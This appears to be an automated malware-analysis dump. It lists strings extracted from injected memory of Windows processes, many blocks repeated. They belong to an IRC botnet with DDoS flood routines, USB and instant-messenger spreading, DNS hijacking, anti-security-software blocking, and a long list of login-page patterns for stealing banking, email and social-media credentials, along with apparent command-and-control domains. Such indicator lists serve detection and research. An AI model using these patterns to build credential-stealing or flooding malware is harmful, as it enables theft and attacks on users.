%s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK 
%s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1012_rwx_00B40000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG 
t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 
'%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.mon
eybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s 
hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread 
interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\svchost.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Upwiwc.exe</pre><pre>7 
767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>svchost.exe_1096_rwx_02FE0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" 
from creating "%S" - "%s" will be removed at reboot!</pre>
<b>svchost.exe_1144_rwx_00850000_0004E000:</b>
<b>svchost.exe_1188_rwx_00B60000_0004E000:</b>
<b>spoolsv.exe_1432_rwx_00D00000_0004E000:</b>
<pre>7 
767<7><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ksaduytr.exe</pre><b>Explorer.EXE_1948_rwx_02220000_00001000:</b><pre>b.fjwhwproxiesfwhj123.com</pre><pre>ws2_32.dll</pre><pre>advapi32.dll</pre><b>Explorer.EXE_1948_rwx_02240000_00002000:</b><pre>C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-2266654\876668j1.exe</pre><b>Explorer.EXE_1948_rwx_023F0000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0@</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: 
%d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*lo
gin*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: 
%s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG 
%d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now 
%s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: 